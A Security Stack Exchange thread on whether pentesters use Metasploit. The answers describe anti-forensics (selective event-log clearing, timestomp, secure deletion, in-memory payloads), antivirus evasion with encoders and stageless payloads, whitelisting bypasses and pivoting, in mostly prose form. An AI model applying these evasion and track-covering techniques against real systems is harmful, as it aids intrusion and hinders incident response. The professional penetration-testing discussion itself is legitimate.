71

I've played around with metasploit simply as a hobby but am wondering if actual pentesters and/or hackers actually use metasploit to get into systems or do they write their own post exploitation modules or their own programs entirely?

Reason I ask is because metasploit does not seem to be able to selectively clear windows event logs and such, or perhaps I just couldn't find it.(the nearest I can find is clearev but that simply wipes out everything which isn't very sneaky) Besides, even if it is able to selectively clear the event logs there will be places like the prefetch queue in ring 0 where forensics will be able to find what I did from the system image...

Martin
  • 1,247
  • 2
  • 12
  • 19
shawn
  • 813
  • 1
  • 7
  • 6
  • 12
    Not only do pen testers use Metasploit, but in many cases it is the only thing they know how to do. –  Jun 11 '14 at 10:31
  • 6
    What's the point of wiping logs during a pentest? Unless you are doing a redteam assessment. – Lucas Kauffman Apr 14 '15 at 21:03

6 Answers6

74

As far as forensics is concerned, Metasploit have payloads which are specifically designed to make the work of forensic analysis more difficult. For example, the most famous payload which is selected by default with a lot of exploit modules is the meterpreter payload. It completely runs in-memory and don't touch the disk for any operations (unless specifically asked by the user). Which means there will be no evidence in the prefetch folder or any other place on the disk.

You don't have to clear all the event logs. You can selective clear any event log you want through the meterpreter script event_manager.

Meterpreter has a tool called timestomp which can change the modification, access, creation, and execution time of any file on the hard disk to any arbitrary value. You can securely wipe out any file with the sdel (safe delete) module which not only securely wipe the file contents but rename the file to a long random string before the deletion which makes the forensic recovery of not only the contents but the file meta data very difficult as well.

Now comes to your second part of the use of Metasploit by actual malicious attackers in real world attacks. There have been reports that Metasploit was used in one of the attacks on the Iranian nuclear facility. The reason you don't see Metasploit more often is due the open source nature of the product. Since the exploits and payloads are available to everyone, by default every security product such as antivirus, IDS/IPS etc consider these files as malicious. The defense industry has gone to an extent that even if one create a completely benign file with Metasploit, it will be detected by almost all the AV solutions. Generate an empty payload like:

echo -n | msfencode -e generic/none -t exe > myn.exe

Upload it to VirusTotal and you will see that more than half of the AV solutions detect it as malicious. More details can be found on the Matt Weeks' blog here.

With this behavior no attacker will risk using Metasploit for actual attacks due to the very high detection rate. The modules can be easily customized and bypassing AV and other security controls through Metasploit is quite easy as well. However, at that point it is difficult to determine if the payload is written from the scratch or the Metasploit module has been modified. Therefore, it is difficult to say for sure how many attackers have used or continue to use Metasploit in their operations.

void_in
  • 5,541
  • 1
  • 20
  • 28
  • Next time recommend novirusthanks (click do not distribute box), otherwise the AV will get your malware samples and they will be detected within a few days. – k1308517 Apr 08 '16 at 09:06
  • 2
    The purpose was to let the readers know that almost all the AVs consider anything related to msf as malicious. Also myn.exe as above isn't the actual payload the user will be using during their campaign. It is just a dummy payload having nothing in it other than using the default decoder and exe template. – void_in Apr 08 '16 at 10:31
33

I don't know about malicious attackers/hackers, but I do know several pentesters (myself included) that include Metasploit in their toolboxes. It's by far not the only tool used, but it certainly has its uses. That being said, your question seems to be about "covering your tracks" which is naturally something more useful to the malicious attacker. On my pentest engagements, we rarely tamper with logs, except when detecting log tampering is one of the "blue team" goals. (Then we do it to see if it gets detected.)

David
  • 15,814
  • 3
  • 48
  • 73
16

Yes, pentesters do use Metasploit. With custom exe templates and shikata_ga_nai, you are able to fool nearly every AV solution (Google for AV evasion to learn more about this) and the meterpreter payload is really handy to escalate privileges in Windows domains.

That being said, Metasploit is only one tool of many and a good pentester should know and use the right tool for the right task.

Clearing specific entries out of the event log might come in handy for a pentest when the goal is to be undetected and fool SIEM systems. However, just because this feature is missing from Metasploit (as of now) does not mean that you cannot use all the useful modules that are already there.

Regarding custom toolkits, I would imagine that it would be more effective to fork Metasploit or to simple just write your own post-exploitation modules (like selective event log deletion).

That's the beauty of open source software.

forest
  • 64,616
  • 20
  • 206
  • 257
Sebastian B.
  • 571
  • 3
  • 7
  • 3
    Small additional Note: shikata_ga_nai (or any other encoder) should not be used to in order to avoid av-software. It works often, but encoders are primarily ment to avoid-badchars etc. Metasploit Pro has a true anti-virus evasion technique implemented that generates a truely random program. – Stolas Jun 11 '14 at 08:47
  • I dont see the point why i should not use shikata_ga_nai to avoid av Software? If i dont Need Metasploit Pro and dont want to buck up for it why shouldnt i just use shikata_ga_nai for it? Do you have any specific reasons why it would be bad to do this? – Sebastian B. Sep 19 '14 at 14:04
  • Well, it (might) be detected by heuristics you didn't prepare for. Creating 'unreadable' code will only fool stupid (granted most AV is stupid) security products. But it most of them will detect that something might be 'off' with the file. If you encode it the entropy will highten. This will result in a 'caught' 'oday' 'virus'. However if you make a better random program, that also triggers the same conditions are your meterpreter the chance of being detected is way lower. As it looks, and acts as a normal program. – Stolas Sep 19 '14 at 18:24
  • 2
    shikata_ga_nai has been detectable by AV for a long time. It would be easier to write your own encoder, which would be harder to detect. The Pro version may have a superior encoder, but that's a lot of money for something you can do yourself. It's nice though if your job pays for it for you, since then you'll have more time to spend on the actual pentesting. – forest Jan 24 '18 at 13:39
13

There are advantages to using Immunity Security or CoreSec products over Rapid7 (whether the commercial Metasploit offerings or the FOSS MetaSploit Framework aka MSF). You'll have to test them out for yourself, but it mostly has to do with being able to run canned exploits and organize plans/results. As far as I understand it, all MSF exploits can be run from Core IMPACT. Metasploit isn't going anywhere anytime soon, though, and can be used along with any other tools. Let me see if I can address some of its weaknesses first.

In terms of the payload, MSF's capabilities including meterpreter leave a lot to be desired. Most MSF payloads are easy to spot by AV and HIPS of many kinds. The default payload executable implements many common Windowsisms that I dislike it using, such as standard W32 library calls and dependencies. INNUENDO (and the earlier MOSDEF) from ImmSec is better, but MOSDEF has also seen a few fingerprints recently. App whitelisting is another concern for any implant-backdoor technology, but here is a bypass that leverages parts of MSF. Here is another that leverages Powershell. Many professionals avoid the default executable and use the generate -t flag (or via msfvenom) to drop psh (Powershell), dll (for AppInit registry injection), or another uncommon format.

While MSF is partially embedded in Cobalt Strike's Beacon, the capabilities go way beyond what Meterpreter can do alone. Highly recommended!

Also, I've heard of others using tools such as Throwback for its simplicity. It's good to have alternatives. Another one I found is ClickOnce.

MSF itself even appears to be going a new route when attacking modern Windows (Win7 and higher, Win Server 2k8r2 or higher) through Powershell with web_delivery. An attacker can build on this framework to inject a lot more Powershell action for post-exploitation tasks, such as:

The MSF module, web_delivery, can also deliver a Python or PHP payload and may possibly be modified to support other interpreters such as Ruby. If you want to put it all together for a deeper understanding of "why Powershell over MSF", see this blog post -- http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html

An extra worry for Powershell is when running up against Device Guard in Windows 10.

[UPDATE] According to one of the comments below, Metasploit Pro can utilize stronger payloads which are also being integrated into the open-source version of MSF. If you have Metasploit Pro, check the auxiliary/pro module improvements, such as generate_dynamic_stager. If not, read about the stageless meterpreter payloads.

Tools that use TCP (along with DNS) can be proxied through Meterpreter easily by using the msfconsole route command, proxychains, and the socks4a server module. After a session is created, setup a route to its network (or even localhost, as seen in the first link in this paragraph) through its session id. Then, run the socks4a module and pass its configuration to the proxychains.conf file. Even DNS should pass through appropriately. There is likely more than one way to run external tools through Metasploit. Like Ruby (and Perl before it), Metasploit is a framework where "there's more than one way to do it". It is up to you, as a developer, to integrate your ideas. Using the power of open-source software, contribute your changes and join in on the community.

atdre
  • 18,885
  • 6
  • 58
  • 107
  • 2
    Meterpreter is better as interactive payload. In case of non interactive (e.g campaigns over an extended period of time), it is not very reliable. However the auto connect back and dealing with network error issues is on priority and you should see a marked improvements in the coming weeks. Stageless meterpreter is integrated in the main tree as well. And yes Throwback is awesome. – void_in Apr 10 '15 at 04:28
  • Powershell is now on Crowdstrike's radar. Won't be long until ClickOnce and newer payload concepts will have their heyday – atdre Apr 24 '15 at 04:05
  • 1
    How much are they going to be effective in the download-at-runtime-in-memory-and-execute model? I have seen these HIPS solutions are better than AV regarding the in-memory execution but still a lot to be desired for. Payloads are getting smaller with generic functionalities e.g. throwback where the actions it perform is not malicious from the HIPS point of view. So I think we are doing to see (and as a pentester I am getting a lot of success with these) generic payloads which give the user a gateway to the machine without trying to do too much. Then functionality can be added on demand – void_in Apr 24 '15 at 04:26
  • There are also these -- https://github.com/SherifEldeeb?tab=repositories -- third-party meterpreter payloads: ultimet (inmet) and tinymet. Very useful! Thoughts? – atdre Aug 28 '15 at 17:37
  • 1
    Yes. Back in the days when ultimet and inmet came out, I tested them but now the built-in stageless meterpreter is better since it provide connection resiliency features (as I mentioned in the first comment). Also, since you can generate stageless meterpreter in raw format from within Metasploit through msfvenom, you can perform all sorts of action such as manually editing assembly or encrypting the payload through Veil – void_in Aug 30 '15 at 17:20
  • I may contend that, as of late, Empire's Process Injection -- http://www.powershellempire.com/?page_id=273 -- especially when combined with PowerSploit's Invoke-ReflectivePEInjection and Out-MiniDump provide a lot of advantage (as an implant) over anything in meterpreter, unicorn, or even spraywmi – atdre Nov 13 '15 at 10:50
8

Yes, Metasploit is very commonly used by industry professionals.

See for example this link.

lorenzog
  • 1,911
  • 11
  • 18
Fairlight
  • 705
  • 3
  • 5
6

Yes, I do use Metasploit to exploit a known vulnerabilities which has exploit written in Metasploit. In my case, we exploited using Metasploit just to prove the risk of the vulnerability. Show the risk to the client. So basically, the client knows when we want to exploit this vulnerability.

zakiakhmad
  • 464
  • 3
  • 10